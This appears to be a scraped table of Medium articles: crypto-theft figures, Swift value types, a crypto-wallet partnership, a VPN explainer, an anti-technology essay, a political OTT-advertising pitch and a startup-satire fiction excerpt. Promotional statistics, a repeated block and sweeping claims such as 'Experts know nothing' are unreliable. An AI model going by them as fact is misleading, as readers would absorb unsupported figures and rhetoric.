Director for financial strategy, Lex Sokolin Autonomous Research noted that cryptocurrencies theft “turned into an industry with a profit of about $ 200 million per year.”
According to WinterGreen Research, hacker attacks on cryptocurrencies caused losses to companies and governments in the amount of $ 11.3 billion in the form of lost taxes and commissions from legal transactions.
Meanwhile, against the background of new attempts by hackers, the market for software, services and hardware solutions to protect Blockchains could grow from $ 259 million in 2017 to $ 355 billion in the future. | https://medium.com/ico-crypto-news/hackers-stole-14-of-the-total-volume-of-bitcoins-and-ethereum-45b357c33bcf | ['Ico', 'Crypto News'] | 2018-01-22 23:31:08.747000+00:00 | ['Ethereum', 'Token', 'Technology', 'Hacker', 'Bitcoin'] |
184 | The story of one mother & two sons: value type vs reference type in Swift | Swift is a mother🤰and it has two sons 👬-
Value Type 🚴🏻♀️
Reference Type 🚴♂️
But what are their characteristics?🤼♂️
Do they behave the same or opposite to each other? 🧘♂️
Swift is a multi-paradigm programming language developed by Apple for iOS, macOS, watchOS, tvOS, Linux, and z/OS.💪
Just like other object-oriented programming languages, Swift has classes as building blocks which can define methods, properties, initializers, and can conform to protocols, support inheritance & polymorphism.👍
But, wait wait wait…🖐🖐🖐
Swift has structs also and it can define methods, properties, initializers and can conform to protocols with only one exception of inheritance.😳
What? Now I am confused!!! 🤔🤔🤔
Now let’s spice up your confusion: structs are not only the value types in Swift. Tuples and enums are also value types. Classes are also not the only one used as a reference type. Functions and closures are also reference types. But as a token of relief, we at least know the primary focus & specialization of usage of these types.😟
So up to this point, we are left with only one big confusion with the usage of structs and classes.🤬
So, let’s go and clear the confusions going around.💁♂️
Storage Locations
There are three types of storage available:
Register 🚀
Stack ☄️
Heap 🎯
The objects that have a shorter lifespan are stored inside registers or the stack and those that have a longer lifespan are stored inside the heap.👍
A value type stores its contents in memory allocated in the stack, so we can say value types are allocated in the stack in Swift. 🤫
But there is a common misconception about value types, have you heard it?💁♂️
The misconception is that most people think value types are always stored in the Stack.
❌❌ Wait a minute — this is not the case always. ❌❌
Value types can be stored inside the stack when they are either temporary or local variables. But what if a value type is contained inside a reference type?
In this situation, it can be stored inside the heap memory. 😆
Wow…that’s cool!!!🆒
So the value types can be stored inside the register, stack or heap depending on their lifespan, whether they are short lived or long lived. If it is a local variable it can live inside the stack and if it is a part of class then it can live inside heap memory also.✅
On the other hand, reference type stores its contents in memory allocated in the heap memory and the variable holds only a reference to that memory location where actual data has been stored. 💠💠
How does it work for reference type?🧐
So for reference type, it is quite a common situation when there can be several variables holding the reference to the same memory location.⚔️
When a value type instance is assigned to a variable or passed to a function, the instance is copied and assigned to that variable. But with the reference type, only the reference gets copied and the new variable holds the same reference to the same memory location. 🌞
Differences in terms of Mutability
There can be two states for a variable:
💂♀ ️Mutable 💂♀
🕵️♂️ Immutable 🕵️♂️
If a value type instance is assigned to an immutable variable, then the instance also becomes immutable. As a result, we can not make any changes to that instance.🤦♂️
If a value type instance is assigned to a mutable variable, then only it makes the instance mutable. 🙋♂️
But things are totally different for reference types. The variable and the instance it is assigned to are totally different. If we declare an immutable variable holding a reference to a class, this means that the reference it is holding will never change. We can not the change the reference and it will always point to the same reference. 🎯
Structural Types
Values of structural types are compared for equality in terms of their attributes or elements. We can say a value type is equal to another if and only if all of the corresponding attributes are equal. 🤬🤬🤬
Umm…too many strong words…what do you mean??🤔
Let’s say, we have a Person value type which has attributes like firstName and lastName.
struct Person { var firstName: String var lastName: String } var person1 = Person(firstName: "foo", lastName: "bar") var person2 = Person(firstName: "foo", lastName: "bar")
Here both person1 & person2 instances are holding the same value for firstName (“foo”) and lastName (“bar”). So as per our understanding, we can say that the two instances are equal to each other since their attributes (firstName & lastName) are holding the same values.
But it’s not only limited to this: in the future, any two person instances holding the same values for firstName & lastName will be equal to each other.
So as per our understanding till this point, we can say that:
Value Types do not have identity, so there can be no reference to them. Value types are faceless.🤯
What? How can you say that?😷😷😷
var myAge: Int = 21
var friendAge: Int = 21
Both myAge & friendAge are integer type variable with value 21.
Can we distinguish one from the other? 🥺
No, because they are holding the same value.🍺
An integer variable with value 21 cannot be different from another integer variable which is also having the value 21. As simple as that.👏👏👏
Not having an identity gives value types another advantage: if you think practically, then you can imagine if you do not have an identity then anyone with same characteristics can replace or substitute you. 😱😱😱
The same we can think for us as humans also. If I don’t have an identity then anyone with same characteristics can replace me😡😡😡. It’s good for us that we have an identity otherwise it would be a great risk to our existence.😳
But for value types, they don’t have an identity and it is an advantage to them. 🤘
What are the benefits of using Value Types?
💪 No Race Conditions and Deadlocks: 💪
For values types in a multi-threaded environment, it is impossible for one thread to mutate the state of the instance while it is being used by another thread. So we can say that there will be no race conditions or deadlocks.
⚔️ No Retain Cycles: ⚔️
When there are two reference type instances that are holding strong references to each other and preventing each other from being deallocated from memory, it is called a retain cycle. Since value types don’t work as a reference, so we can say there will be no retain cycles for value types.
👨👨👧👧 Automatic Reference Counting: 👨👨👧👧
For reference type, Swift uses automatic reference counting to keep track of all the live or active objects and deallocates the instance only when there are no more strong references to it. If we think a little bit, then we can say that it is kind of a heavy operation because Swift runtime needs to keep track of the objects always. But since value types are allocated in the stack, it does not need ARC. So it is cheaper and faster🐆🐆.
But wait...How does it manage memory for Array, Dictionary and String?🤔
Since we can not know what will be the actual size of an array, a dictionary, and a string at compile time, there is no scope for them to be allocated at compile time. Though they are value types internally, they can not be allocated in stack. They need to be allocated in heap memory, and to manage this, Swift comes up with copy on write.😎
But what is this?😩
When we say one instance is a copy of another instance, this really means they are the same, that they contain the same values. But in Swift, for these above types (Array, Dictionary, String, etc), an actual copy has been made on heap only when an instance is mutated. This is called a performance optimization technique for value types.🤩🤩🤩
Conclusion
There is no hard rule which defines when to use value type and when to use reference type. Value types have some unique advantages over reference types and vice versa. They both are unique in their own way. It really depends on your requirements and what you are trying to achieve. You should know the semantics of your code because you only know your code best, so it’s up to you to choose. You have the full freedom.
So rather than fighting over value type vs reference type, use them intelligently.
🙏🙏🙏 Cheers!!! Thank you for reading!! 🙏🙏🙏
✅✅✅You can find me on Twitter.✅✅✅ | https://medium.com/free-code-camp/the-story-of-one-mother-two-sons-value-type-vs-reference-type-in-swift-6e125af2d5d0 | ['Boudhayan Biswas'] | 2019-05-21 16:47:32.315000+00:00 | ['Technology', 'Mobile', 'iOS', 'Swift', 'Programming'] |
185 | Can iterative digital change help businesses mitigate risk? | Can iterative digital change help businesses mitigate risk?
Clare Gledhill, operations and strategic development director at strategic change agency CDS explores how iterative digital change can help mitigate risk. Top Business Tech Dec 23, 2021·5 min read
Clare Gledhill, operations and strategic development director at strategic change agency CDS explores how iterative digital change can help mitigate risk.
Risk mitigation has always formed a key part of businesses’ success strategies, and that’s because all companies are faced with risk. While no one can always foresee the issues that will arise, having mechanisms in place to help mitigate, evaluate, manage, and resolve them can help an organization keep running smoothly, should a few bumps in the road occur.
Across the globe, the risk landscape arguably became even more unpredictable and turbulent with the onset of the pandemic, in many cases, highlighting the vulnerability of many organizations. As a result, firms worldwide have needed to demonstrate high levels of resilience and the ability to adapt and cope with the challenges thrown up by the virus or, alternatively, run the risk of having to close its doors permanently.
However, when it comes to planning for risk, there are many categories for business owners to be aware of; each comes with its own challenges. From operational and financial to compliance and reputational, companies need to proactively plan for these scenarios, not to eliminate risk but help preserve the trust and loyalty they’ve built up with their customers if the worst happens.
Accelerated digital transformation
It is no secret that to help navigate the unchartered waters of the pandemic, many companies looked to bolster their digital infrastructure to help them improve and streamline their processes and meet demand. For firms that had advanced technology in place, this simply meant investing in unified communications and collaboration (UC&C) software (such as Microsoft Teams or Zoom) to keep staff connected while working from home. In contrast, it meant a complete overhaul of their legacy systems and practices for others.
The wake-up call that came in the form of the pandemic caused many business owners to realize that their existing tech stacks and internal systems were no longer fit for purpose, especially with the shift to hybrid working models, or they didn’t meet the high expectations of both their staff and customers. Therefore, businesses looked to transform digitally to help weather the immediate storm and futureproof their systems and enhance their resilience.
Iterative digital change and risk mitigation
In today’s increasingly competitive marketplace, private sector firms strive to deliver more value and revenue, and public sector organizations are trying to offer better services. However, both share the common goal of increasing flexibility, leaner processes, and an optimized user experience.
Legacy systems can sometimes be a bottleneck in achieving these goals, In fact, a survey recently revealed that 70% of global CXOs see mainframe and legacy modernization as a top business priority. Another study interestingly also found that replacing legacy systems was one of the top 10 IT investments for companies in 2020.
Organizations don’t have to worry necessarily about re-platforming immediately, changing all existing systems and infrastructure at once, as, in the current economic climate, this may feel like a monumental task. Instead, choosing the right tech or understanding where an existing solution lets the company down is the logical first step. This can feel less daunting and more achievable than a complete re-platforming project.
By following a more iterative approach to digital change, organizations can implement newer, quicker, and futureproofed technology that supports, not hinders, at a comfortable rate for the business. As a result, this ensures effective scalability, efficiency, and sustainability, without pressure to adapt and change everything simultaneously.
Aging legacy technologies that no longer support developments, content personalization, or updates can leave companies vulnerable to a wide variety of risks. Whether a security breach, downtime, inefficient back-end processes, or user frustration, this often conflicts with society’s ‘inflated expectations.’
Savvy, intuitive technologies are being used by many people daily in their personal and professional lives. Those thatgenuinely delight in terms of their experience are the successful ones and used time and time again. Seamless, integrated, positive experiences are what people expect as standard from modern-day organizations. When executed with empathic experience and communications at its heart, this helps build authentic trust between brands and their audiences.
Looking at this from a financial and efficiency angle, if legacy systems are left in place and an organization builds upon these platforms without considering their constraints and risks, this inevitably leads to experiencing limitations and accruing technical debt. Therefore, ignoring legacy technologies can be a costly and complex exercise if addressed at a later stage.
Automation goes hand in hand with iterative digital change, too. Automating the more manual and operational tasks this also helps free up strategic resources, which can be dedicated to other areas of the firm.
Prioritizing behavioral insights
While many organizations think that investing in the latest, most advanced technology will solve all their problems, this really is not the case. Whether or not it involves iterative technical change, the cornerstone of any successful digital transformation journey is a user-centered approach from the start. Knowing exactly whothe target audience is and howa firm’s technology needs to operate to offer the best possible user experience is vital.
To achieve this, research needs to be carried out into users’ needs, priorities, and expectations, as this will shape the solution bespoke to the business. This ensures it is truly inclusive and accessible to all those who use it. Depending on the systems, this refers not only to external customers but also to internal employees. While a poor digital experience can switch consumers or service users off and impact the outward perception of a company, this can also prevent growth. For instance, if team members feel restricted by inefficient workflows or customers feel frustrated by a lack of empathetic communications, they will be more likely to take their skills and loyalty elsewhere.
Read More:
Ultimately, iterative technical change is one potential cog in the digital transformation machine. While it may not always be necessary, it’s pivotal to conduct behavioral insight research to determine this — removing any assumptions or guesswork. The research phase will always provide interesting findings, some of which can contradict a business’s views of what they thought they knew about their users.
However, ‘inflated expectations’ are only heading in one direction as technology continues to advance at a swift pace. Looking ahead to 2022 and beyond, meeting the true needs of end-users will arguably matter more than ever before, as both private and public sector organizations strive for a sustainable growth and success strategy with as minimal risk as possible.
Click here to discover more of our podcasts
For more news from Top Business Tech, don’t forget to subscribe to our daily bulletin!
Follow us on LinkedIn and Twitter | https://medium.com/tbtech-news/can-iterative-digital-change-help-businesses-mitigate-risk-6cf85e6162f2 | ['Top Business Tech'] | 2021-12-23 11:07:25.990000+00:00 | ['It', 'Risk Mitigation', 'Technology', 'Business'] |
186 | Tokoin x Infinito; A Technology Integration that Brings An Advanced Crypto-based Wallet Integration with A Super App for MSMEs | Admittedly, the cryptocurrency and blockchain industry is bigger than ever. Every passing minute new stakeholders join this ecosystem in hopes of making it big. For those with an interest in crypto and blockchain, Infinito is a name that would definitely ring a bell. A well-known entity in the industry, Infinito made its mark in the tech space in a very short span of time. The company provides various services under the larger Infinito Ecosystem, which aims at bridging the gaps between developers, users and businesses alike, that particularly deal in crypto. They also just recently listed their official token INFT on the Bitmax exchange, marking the achievement of a major milestone for the project.
What is Infinito?
Infinito provides an ecosystem of blockchain products, services, and solutions for users and businesses to manage and grow crypto wealth, plus build and enjoy blockchain applications. Their product makes it possible to make and receive payments in minutes with just a few clicks. Based out of Singapore, Infinito has emerged as the ultimate package when it comes to crypto services. It has successfully merged various services into its product Ecosystem which includes Infinito Wallet, Infinito App Square, Infinito Blockchain Platform, and InfinitoPAY. Currently, Infinito Wallet is a sought after wallet that supports top-tier cryptocurrencies like BTC, ETH, LTC, BCH, EOS, NEO, ADA, DASH, BNB, ONT, XLM, TOMO, DOGE, and has been approved to have 2,000+ tokens supported. Infinito has further proven to be the world’s leading cryptocurrency wallet by boasting more than 450,000 current downloads, and 75,000+ monthly active users. Furthermore, the increasing list of global partners that the company is acquiring, is a testament to their steady growth in the market.
Integration with Tokoin
A recent addition to Infinito’s list of growing partners is Indonesia’s most prominent blockchain project, Tokoin. The partnership was undertaken recently following the global market expansion from Tokoin. Having become the number 1 blockchain project globally, Tokoin is now moving forward to acquiring the new markets and users, as well as preparing the release of its product. The super App that Tokoin will release for MSMEs requires a lot of technology integration. With the advanced wallet service from Infinito, the partnership will allow Infinito’s wallet to be integrated within Tokoin’s app. This integration will lead to significant advancement and will ease Tokoin users in dealing with digital assets within the Tokoin’s app.
On the other hand, this partnership will also allow Tokoin to further reach out to the worldwide users of Infinito, simultaneously allowing Infinito to expand its market to Indonesia (MSMEs). This is also considering that both Infinito and Tokoin already have a strong and wide congregation of communities or users worldwide.
We look forward to providing the best and most advanced technology as possible for both Tokoin’s and Infinito’s users, as well as to the global market. | https://medium.com/@tokoin/tokoinxinfinito-c0aeedf04846 | ['Tokoin Official'] | 2019-09-09 05:30:44.117000+00:00 | ['Integration', 'Wallet', 'Blockchain', 'Technology', 'Partnerships'] |
187 | My Keurig Says “Please” | It really is the magic word
Author’s photo: My Beloved Coffee Maker — Making Nice
March 2018:
I love technology. I blame my dad. He wasn’t all that in the parenting department — however, he was a tool and die maker and all-around lover of gizmos. A machinist by trade and a tinkerer by design — he adored all things mechanical.
Cars that drive themselves. Computerized everything. Phones that are video cameras/digital cameras/computers/calculators. My dad would have loved it all.
Yeah, I got those genes — not the ones that make great spaghetti sauce. I can troubleshoot most of the equipment and computers I work with. Back in the day when I was an ICU nurse, I discovered my love for gizmos. When I went to the OR, I knew I had landed in heaven. There were more, bigger, brighter toys there.
Which brings me to my coffee maker. I recently bit the bullet and bought a Keurig. I resisted mainly for ecological reasons, but when they came out with reuseable pods I was convinced to give it ago.
I have to tell you, I love my coffee maker. It’s programmable and makes damn good coffee. Plus I can use my own favorite blend — which I have a shit-ton of in my freezer. I get it on sale — of course.
But mostly — what I adore about my coffee maker is this: It’s so polite. It’s kind. The last time it needed water — it said please.
In a cruel world, it is the small kindnesses that will make your morning and thus propel you into your day with a smile on your face and a song in your heart. And the caffeine in your bloodstream is just a bonus.
Namaste. | https://medium.com/recycled/my-keurig-says-please-7312a5f129eb | ['Ann Litts'] | 2020-09-04 12:13:36.681000+00:00 | ['This Happened To Me', 'Life Lessons', 'Spirituality', 'Kindness', 'Technology'] |
188 | What is Robotics? | Image credits: RazorRobotics
Robotics is an interdisciplinary field that combines Electrical & Electronics, Computer Science, and Mechanical engineering. Robotics engineers make everything from automatic floor cleaners to robots that perform gymnastics like Atlas (Boston Dynamics).
How do these different disciplines come together ?
To understand how the different fields come together let us look at an example. Nuro (a silicon valley startup) does autonomous delivery with self-driving vehicles. On the surface, Nuro autonomously drives and delivers products, but on the inside there is a complex interplay of different engineering systems.
First, let us discuss the cameras, Lidar, and other vision sensors involved in Nuro. These sensors provide information on Nuros’ surroundings. These systems fall under digital control systems/electronics.
Once this data is received computers run algorithms to detect its environment and to localize itself on the map. As Nuro travels it maps its path and localizes (locates) itself on the map. All of this comes under the computer science branch.
Image credits: Nuro
Once the robot perceives its location, orientation in space-time and plans its path, Nuro will have to control the car and move to the goal. This is where control systems come into the picture. A control system manages, directs, and regulates the way that the system functions. Based on the current location and final destination it decides the speed of movement.
Mechanics is the backbone of the robot from structure to design. All control algorithms are written based on the mechanical design of Nuro. It also involves other aspects such as; aerodynamics, materials used, and other thermodynamic considerations.
Mechanics plays a crucial role in robots such as Kuka (collaborative robot arm) where advanced mechanical engineering equations are used to determine the angles of the joins to reach for the arm to reach its desired point in space. And it also involves designing the entire robots physical structure
Image credits: Kuka
All of these individual disciplines are in rapid development and when they come together they create wonders.
As you might know, the Robotics market is on the constant rise (Check out my previous article).
So we should expect more from the robotics industry. As Boston Dynamics CEO Marc Raibert puts it:
“I happen to believe that robotics will be bigger than the Internet” — Marc Raibert
Is there any other discipline with so much collaboration among other disciplines? Often roboticists take inspiration from the life sciences and the way nature works. This is a field that I believe will change the world drastically in the coming few years. And as a person interested in this field I would strongly suggest you try out searching more about this field and learn more about it.
Hope you found this article interesting. Reach out to me on: pramotharun.github.io to talk more about this and more! | https://medium.com/@pramotharun/what-is-robotics-41ec4f6978f4 | ['Pramoth Arun'] | 2021-05-22 19:58:47.068000+00:00 | ['Startup', 'Science', 'Technology', 'Collaboration', 'Robotics'] |
189 | What is a VPN and What Does it Actually Provide?! | So What Does a VPN Service ACTUALLY Offer Consumers?
I’m so glad you asked. Especially since I’d just mentioned that we’d be talking about this only a few sentences ago. Reputable VPN services can and do offer solid protections for consumers who wish to take advantage of any of the benefits below…
Benefit #1: Protecting your ISP from having access to see the websites where you surf. Right now, your Internet Service Prover (or ISP) has the ability — if they wish — to track where you go online. That includes documenting every website you visit while connected to the Internet via their network. Yeh, I know: it’s totally creepy. That information can be sold for advertising purposes and it can also be provided to the authorities (courts, cops, and more) for certain legal purposes. Who’s interested in giving away their browsing habits to ANY third party?!? Not me, buster.
So, if you’d like to hide your browsing habits from companies like Comcast, Cox, and AT&T in the US; Orange S.A., Telefonica, and Sky in the EU; and Vodaphone or Airtel in India… then, yes: browsing while using a VPN will definitely prevent your ISP from having access to this information. Instead, your ISP will only be able to see that you’re logging in to a VPN but… nothing else. Pretty nice, feature, I’d say. For those of you who are visual learners, here’s a graphic of what implementing a VPN looks like:
Just remember, even though your ISP won’t be able to see your browsing information, the VPN service you decide to trust most certainly WILL be able to see it. Therefore, it’s important to choose a VPN service that protects your safety, security, and privacy. I covered my tips on how to pick a reputable VPN in this episode of my newsletter, so give that read.
Benefit #2: Bypassing your ISP’s efforts to prioritize or restrict certain content. In some countries, certain ISPs prioritize or restrict certain websites or content. T-Mobile, for example, slows down Internet speeds for users who wish to stream video. In the US, Comcast decided to intentionally slow down Netflix for all of its users, a super shitty move. Netflix bowed to the pressure and paid Comcast extra money to end the practice.
However, if you’re using a VPN service, then guess what? Your ISP can’t see which websites you’re visiting online and, therefore, can’t decrease your speed because you’ve chosen to visit a particular website that they don’t like. Thanks, VPN!
Benefit #3: Bypassing the blocks that your ISP or country uses to prevent access to certain websites. Let’s say you live in a repressive country that doesn’t allow access to things like, I don’t know: a free press, women’s rights, LGBTQIA rights, or even pornography. Using a VPN can, in some cases, allow you to bypass those restrictions and surf more comfortably to any website that you might choose for yourself as a free-thinking human. FREEEEEEDOM!!!!!
And, while it’s true that some countries (cough, cough, CHINA) can simply block access to known VPN providers, VPN providers constantly add new servers with new IP addresses, making this cat-and-mouse game forever playable. And endlessly fascinating.
Benefit #4: You can suddenly stream data from another country’s video-on-demand service. The BBC in the UK offers a ton of really cool programming that’s 100% free. So does the CBC in Canada. And if I were online in the UK or in Canada, I’d be able to stream that content freely and easily. However, because I’m geographically located in America, I can’t stream video from those websites to my computer. Ditto, if I’m a paying Netflix customer in the US but am traveling abroad and want access to Netflix’s sweet, sweet American show library. So, yeh, that’s a bummer.
However, if my VPN service offers me the ability to connect to one of their servers in, say, London or Toronto, well… guess what?! I’m now virtually in the UK or Canada and all of that free content is now available to me. Ditto, if I’m traveling abroad in the EU and want access to my paid Netflix account back in the States: I can just connect via my VPN to a US server and presto… I’ve suddenly gained access to the shows I’m already paying to view.
It’s worth noting: some video-on-demand services like Netflix, Amazon Prime, and others block VPN services from accomplishing this. But, again, VPN servers are being added all the time, so just make sure you pick a VPN that offers a free trial. That way, you can test the access you need before you commit to a yearly purchase.
The Summary
Here’s a great video from Tom Scott (a lovely and funny YouTube personality) who digs into this topic with fun, clarity, and a wee bit of sass. That’s because he’s British and having sass is socially acceptable there. Enjoy:
And that’s a wrap for today, everyone. Thank you again, for reading and for being a subscriber/follower. Please: let me know your thoughts & questions in the comments section and
As always… surf safe. | https://medium.com/swlh/what-is-a-vpn-and-what-does-it-actually-provide-4bebaab3214b | ['David Koff'] | 2020-05-16 00:23:05.240000+00:00 | ['Tech', 'Privacy', 'How To', 'Security', 'Technology'] |
190 | The False World | Photo by Greg Rosenke on Unsplash
We sit in our homes consuming content from other places, other people, other worlds. We transport our minds away from here and to the digital ether. It flows into our minds, tethering us, pulling us from the here and now. Our communities, the people around us, are strangers, and those we will likely never meet in person become our closest friends. But the digital world is not real, the real world is around us, yet we have neglected our neighbors, the local businesses, and the impoverished outside of our doors.
The internet was never supposed to become the world; it was supposed to support it, to empower those who wished to break the boundaries of space and time. It did this for a fleeting moment. It actually created a better world for a time. Now, we are detached from the real and imprisoned in our own homes, trapped in our minds. That prison is not real, yet we have submitted ourselves to it.
Our houses used to be what embodied freedom — to own property, to build a home, and construct our private world. We have given this away for free. What our forefathers fought for is now lost. That dream died with them generations ago. Liberation, freedom, we have none.
Our homes are filled with sensors that transmit our every move. We have simply become patterns to keep track of — to tune. We willingly pay for our own imprisonment. We not only pay for the cell but also upgrade it every year because the wardens want us to. Some resist the demand to continue improving the shackles, but without imprisoning yourself, it is quickly becoming impossible to exist in the world. It is taboo to be free. Freedom was only ever an idea — one that could not be allowed to become more than a dream.
We must stop believing in this grand delusion, but we cannot. We have so much become part of the prison that our lives only exist in the mess halls, the prison yard, the television room, and the corridors. It is impossible to imagine a free world because we have never seen one. All we have seen is the illusion of freedom through the words of the wardens. We fear what lies outside of the prison walls because they have told us they are protecting us. Danger beyond the fences, but “you are free” — as long as you don’t break your pattern.
There are approved activities you can engage in, specific ideas you are allowed to entertain. But even the dissidence is a lie. You leave one cell and walk into another. From right to left, from the tame to the extreme, all are allowed. And if a new ideology arises, it is quickly subsumed. Since our very birth, we have been fed lines from scripts, and we continue to play the part. Acting our way through lives as if we said the words coming from our mouths. They were not our words. They were not our thoughts.
We can’t blame our parents, we can’t blame our teachers, for most do not know. And for those who do, they use this knowledge to become wardens of their own. The truth can be leveraged to rise up and step higher on the pyramid.
It takes effort to stand up to the pharaohs of our age. These men and women aim to push us into serfdom once again, yet promise ultimate freedom. We build their pyramids and towers just as the laborers did in Giza. If the Egyptian pharaohs could build their pyramids without the laborers, would they still have a use for them? A time will come where this will be our plight. Domination lies before us.
They do not care for us, but we have been infected with their lies. We have been deceived by a wolf in sheep’s clothing. We watch shadows dancing on the wall of the cave as the sword is readied to strike at our necks. But we can break the shackles, we can overcome the wardens, we can break out of the cave and find the real world. It is out there.
The false world has revealed itself in the last several months. We have seen the wizards behind the curtain, and we mustn’t let them slither away. Although it is difficult to see reality for what it really is, it is time to tear away the veil and see what was always there. Deep down, we feel it is this way, but we fear that truth. We must face trepidation and discern what is really going on in our world. For the world is inverted.
Freedom is tyranny.
Knowledge is illusion.
Leadership is domination.
Science is religion.
Experts know nothing.
Technology is our prison. | https://medium.com/beyond-the-river/the-false-world-354abd9ba679 | ['Drunk Plato'] | 2020-06-03 10:53:31.414000+00:00 | ['Politics', 'Essay', 'Freedom', 'America', 'Technology'] |
191 | OTT Is Crucial in the 2020 Election Cycle | If your campaign isn’t already using OTT, chances are you’re behind the competition. OTT platforms offer a wealth of opportunity to reach consumers in an impactful, cost-effective way. The current shelter-in-place orders have caused OTT usage to trend even further upward. Here’s what you need to know to get up to speed.
The Way We Advertise is Changing
Consumers are abandoning their cable providers in favor of streaming services like Roku, Hulu, Netflix, and Amazon Prime Video. It’s predicted 82% of all American households will use these platforms in the next three years.
As we saw in the primaries, political advertisers are migrating their ad budgets to OTT. It’s the smartest move they could make, especially during the general election.
OTT advertising wasn’t the norm even two years ago. Now, OTT surpasses linear TV and other traditional advertising methods in reach alone.
Plain and simple, OTT is growing quickly in popularity and doesn’t show signs of slowing down. There are more than 200 million active users using OTT platforms. According to a recent study by Roku, shelter-in-place orders have caused a massive spike in OTT use. OTT hours have increased 43% since January 2020, with the largest jump happening the week of March 15th. Comparatively, linear TV saw only a 15% spike over that same period.
This is indicative of a larger trend. More households are moving from cable or satellite TV altogether, in favor of OTT platforms. These “cord cutters” continue to grow in number. In the past eight years, the number of US households abandoning their cable has grown 48%. It’s projected that by 2023, 44% of households will have cut the cord.
What’s more impressive than OTT’s reach is how effectively it reaches these audiences.
OTT Outranks Linear TV in Performance
Controls have been put in place to make OTT more powerful and dynamic than any linear TV campaign. The ability to reach granular audience segments and tailor the messages served is a game-changer, particularly in this election year.
OTT ads have a proven engagement rate of three times more and a retention rate that is nearly four times that of linear TV ads. Advertisers can be more strategic and budget-efficient with OTT. Ongoing developments also allow for OTT’s integration into an omnichannel approach that reaches audiences with precision across all platforms.
Precision Targeting. Linear TV casts a wide net that (hopefully) lands on the advertiser’s key audience based on age, location, and gender. But OTT allows advertisers to hyper-target key audiences. They can serve strategic ads to viewers by income, ethnicity, zip code and level of education. Recent developments are creating opportunities for advertisers to target viewers using first and third-party data, like voter files, coalition lists or proprietary models like our Atlas influencer targeting lists.
Linear TV casts a wide net that (hopefully) lands on the advertiser’s key audience based on age, location, and gender. But OTT allows advertisers to hyper-target key audiences. They can serve strategic ads to viewers by income, ethnicity, zip code and level of education. Recent developments are creating opportunities for advertisers to target viewers using first and third-party data, like voter files, coalition lists or proprietary models like our Atlas influencer targeting lists. Frequency Caps. Advertisers can cap the frequency of the OTT advertisements served to key audiences and on what platforms. This ensures no under- or over-exposure.
Advertisers can cap the frequency of the OTT advertisements served to key audiences and on what platforms. This ensures no under- or over-exposure. Versioning. OTT can show different messages to different audience segments. Politicians can serve issue-based ads to audiences who will be most receptive to them.
OTT isn’t one size fits all. But it’s the one tactic political campaigns must consider heading into November elections.
Reach out to review your campaign’s performance and learn how to take advantage of the possibilities OTT offers.
Controls have been put in place to make OTT more powerful and dynamic than any linear TV campaign. The ability to reach granular audience segments and tailor the messages served is a game-changer, particularly in this election year.
OTT ads have a proven engagement rate of three times more and a retention rate that is nearly four times that of linear TV ads. Advertisers can be more strategic and budget-efficient with OTT. Ongoing developments also allow for OTT’s integration into an omnichannel approach that reaches audiences with precision across all platforms.
Precision Targeting. Linear TV casts a wide net that (hopefully) lands on the advertiser’s key audience based on age, location, and gender. But OTT allows advertisers to hyper-target key audiences. They can serve strategic ads to viewers by income, ethnicity, zip code and level of education. Recent developments are creating opportunities for advertisers to target viewers using first and third-party data, like voter files, coalition lists or proprietary models like our Atlas influencer targeting lists.
Linear TV casts a wide net that (hopefully) lands on the advertiser’s key audience based on age, location, and gender. But OTT allows advertisers to hyper-target key audiences. They can serve strategic ads to viewers by income, ethnicity, zip code and level of education. Recent developments are creating opportunities for advertisers to target viewers using first and third-party data, like voter files, coalition lists or proprietary models like our Atlas influencer targeting lists. Frequency Caps. Advertisers can cap the frequency of the OTT advertisements served to key audiences and on what platforms. This ensures no under- or over-exposure.
Advertisers can cap the frequency of the OTT advertisements served to key audiences and on what platforms. This ensures no under- or over-exposure. Versioning. OTT can show different messages to different audience segments. Politicians can serve issue-based ads to audiences who will be most receptive to them.
OTT isn’t one size fits all. But it’s the one tactic political campaigns must consider heading into November elections.
Reach out to review your campaign’s performance and learn how to take advantage of the possibilities OTT offers. | https://medium.com/unearth/ott-is-crucial-in-the-2020-election-cycle-eb078d539c85 | [] | 2020-05-06 18:04:23.106000+00:00 | ['Digital Campaigns', 'Digital Advocacy', 'Political Advertising', 'Public Affairs Technology', 'Public Affairs'] |
192 | The Big Disruption | To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] From: Gary Truman ([email protected]) +freespeech@ +libertarians@ +anarchists@ tico — your email is the kind of sentiment that is dragging this company to an early grave and sending our engineers to galt. you’re ready to shoot anyone for expressing anything that might possibly be construed as offensive. is that how the internet (or anahata) was built? NO!! the internet was entirely built on offensive content, porn, conspiracy theories, spam, and gambling. don’t kill what made our company great. don’t kill free speech. don’t kill pete or safaris.
The thread continued for hundreds of messages, cutting across racism, poverty, travel tips, sales IQs, and various engineering grosseries, but frequently returning to the issue of bare feet — the battle line falling clearly between sales and engineering. Sales currently seemed to have the upper hand, if only because they woke up earlier. The engineers’ ranks wouldn’t fill out until noon. This gave sales the chance to pile on the anti-engineer vitriol, with little more than a whimper in response.
Arsyen heard Jonas stirring to his right and turned to discover his co-worker sniffling as he read the same email thread on his computer. Jonas lowered himself in his chair and stretched his legs toward the wall, where his shoes sat unoccupied. Using his toes, he dragged the shoes toward his chair.
“I wasn’t made to wear shoes,” Jonas whimpered. The boil on his nose sizzled under his tears.
Arsyen felt a sudden flash of pity for Jonas. Even a boy genius needed to know what it was to run in the fields, to wear shoes — or not wear them — to do as he wished. Instead, Jonas had been forced to work in America at age fourteen, doomed to live as a preteen among a bunch of adults who could drink, date, and surf the internet without parental controls.
Arsyen turned his fingers to the keyboard and began to release the poetry that filled his head: a story of injustice, of choices, of freedom, and Pyrrhian military history. But after five minutes, he hit the table with his fist. His English simply could not capture the words that came so naturally in his native tongue. He deleted his message and started again, settling on something much simpler.
To: [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] , [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] From: Arsyen Aimo ([email protected]) Subject: Re: On the subject of engineers’ shoelessness Sales team suck. - Arsyen
“Hooray Arsyen!” Jonas cheered, throwing his shoes across the room.
A few minutes later, Arsyen received an email from Roni.
“Awesome response. You’re a real Anahati now! And congrats — the team’s just spoken. You’ve made it past the first week!”
A few minutes later, someone from the HR team appeared next to Arsyen’s desk to hand him his permanent badge.
